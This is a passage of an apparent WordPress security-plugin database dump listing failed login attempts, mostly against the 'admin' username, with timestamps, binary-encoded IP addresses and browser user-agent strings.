Gecko/20100101 Firefox/62.0'),(5512,7598,1629408615.187491,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����!','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5513,7599,1629409193.485990,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���q�u','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5514,7600,1629409629.254707,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���YY�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5515,7601,1629409783.228081,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@u�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5516,7602,1629410419.173272,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/d�?','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5517,7603,1629411004.566629,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0'),(5518,7604,1629411018.761968,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Q`','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5519,7605,1629411496.598110,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5520,7606,1629412308.370351,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Y\'�I','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5521,7607,1629412964.887730,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����4','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5522,7608,1629413368.541466,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��?�$�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5523,7609,1629413619.044137,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ŃB','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5524,7610,1629414273.077385,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���,�7','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5525,7611,1629415443.453043,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5526,7612,1629415615.364340,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����%+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5527,7613,1629416260.014513,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/d�?','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5528,7614,1629416898.194410,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���P��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5529,7615,1629416901.550279,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���P��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5530,7616,1629416905.502530,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���P��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5531,7617,1629416915.458714,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���P��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5532,7618,1629416925.188000,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���P��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5533,7619,1629416930.284583,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���P��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5534,7620,1629416933.254019,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���P��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5535,7621,1629416936.815684,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���P��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5536,7622,1629416940.210372,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���P��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5537,7623,1629416943.385280,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���P��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5538,7624,1629416946.214160,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���P��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5539,7626,1629416948.442655,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���P��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5540,7625,1629416948.443776,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5541,7627,1629416950.426824,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���P��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5542,7628,1629416953.772101,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���P��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5543,7629,1629416955.511612,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���P��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5544,7630,1629416956.110700,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���P��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5545,7631,1629416956.626900,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���P��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5546,7632,1629416957.073445,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���P��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5547,7632,1629416957.155742,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���P��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5548,7634,1629417503.489062,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5549,7635,1629417630.437099,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5550,7636,1629418321.405602,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��m�;-','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5551,7637,1629419027.412564,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��J(/�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5552,7638,1629419511.963674,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��� @/','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5553,7639,1629419748.170217,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����Ϝ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5554,7640,1629420471.550497,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5555,7641,1629421169.804232,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5556,7644,1629422701.353658,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5557,7645,1629423454.178292,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����-�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5558,7646,1629424185.030093,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���h','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5559,7647,1629424940.849131,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5560,7648,1629424955.617885,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��?�$�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5561,7649,1629425771.343564,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����t\r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5562,7650,1629426534.537624,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����y�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5563,7651,1629426774.893825,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��Ǩf�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),(5564,7652,1629426988.042125,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0�����;','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(5565,7652,1629426988.785178,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0�����;','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(5566,7653,1629427108.353622,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���јs','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5567,7654,1629427282.891536,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����kQ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5568,7655,1629428092.952120,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��O���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5569,7656,1629428930.901086,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h%��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5570,7657,1629429104.655617,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���#<�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5571,7658,1629429697.050046,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����9�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5572,7659,1629430491.341294,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5573,7660,1629431284.160309,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���G�a','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5574,7661,1629431505.487661,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��P�A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5575,7662,1629432103.612331,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5576,7663,1629432920.825207,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Ů�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5577,7664,1629433708.959948,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5578,7665,1629433807.233281,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��-uQi','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5579,7666,1629434594.078753,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5580,7667,1629435375.654124,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5581,7668,1629435923.282890,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@om�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5582,7669,1629436071.268924,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5583,7670,1629436359.733612,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����\\','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5584,7671,1629437108.777881,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5585,7672,1629437504.592615,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ҥ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5586,7673,1629437889.098581,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ca�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5587,7674,1629438265.249148,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���l��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5588,7675,1629438622.313248,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��D��l','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5589,7676,1629439398.069344,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���%{<','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5590,7677,1629439753.256014,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\n�u','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5591,7678,1629440078.647400,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��Ǩf�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0'),(5592,7679,1629440154.266994,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\\>cc','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5593,7680,1629440504.809557,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��D�\n9','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5594,7681,1629440752.566705,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��D��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5595,7681,1629440752.622276,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��D��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5596,7682,1629440901.826082,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3D(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5597,7683,1629441274.817869,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4��~','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5598,7684,1629441629.544771,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5599,7685,1629442031.763404,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0'),(5600,7686,1629442806.286206,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Ů�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5601,7687,1629443196.444287,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���VBe','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5602,7688,1629443227.799587,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���פ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5603,7689,1629443531.782469,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Gڿ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5604,7690,1629443927.965158,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����jQ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5605,7691,1629444271.592848,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�y�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5606,7692,1629444647.641554,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gx��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5607,7693,1629445045.603278,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��O�-','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5608,7694,1629445433.836176,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\rQ(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5609,7695,1629445661.254543,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�� ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5610,7696,1629445802.657197,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���c{)','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5611,7697,1629446178.686533,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5612,7698,1629446562.442200,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��J�g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5613,7699,1629446950.264950,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5614,7700,1629447344.859925,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ѷ�N','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5615,7700,1629447344.921317,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ѷ�N','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5616,7701,1629447597.433297,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-��','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB5; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5'),(5617,7702,1629447780.210516,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���a��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5618,7703,1629448156.753235,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5619,7704,1629448585.396393,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"Qq','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5620,7705,1629449003.975324,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���&V','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5621,7706,1629449417.688611,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����c','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5622,7706,1629449417.701338,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����c','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5623,7707,1629449836.699415,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k��2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5624,7708,1629450262.481311,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k��\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5625,7709,1629451123.331974,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����E.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5626,7710,1629451544.954934,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5627,7711,1629451981.564722,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]qo\"','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5628,7712,1629452417.057484,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���R-','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5629,7713,1629452875.060208,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����dl','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5630,7714,1629453312.670234,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����I','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5631,7715,1629453766.645534,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��P��o','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5632,7716,1629454192.186008,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5633,7717,1629454653.045060,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0'),(5634,7718,1629454675.078090,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��=�F�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5635,7719,1629455111.349822,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ÚW�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5636,7720,1629455580.000615,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ν�:','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5637,7721,1629456059.312409,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���w','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 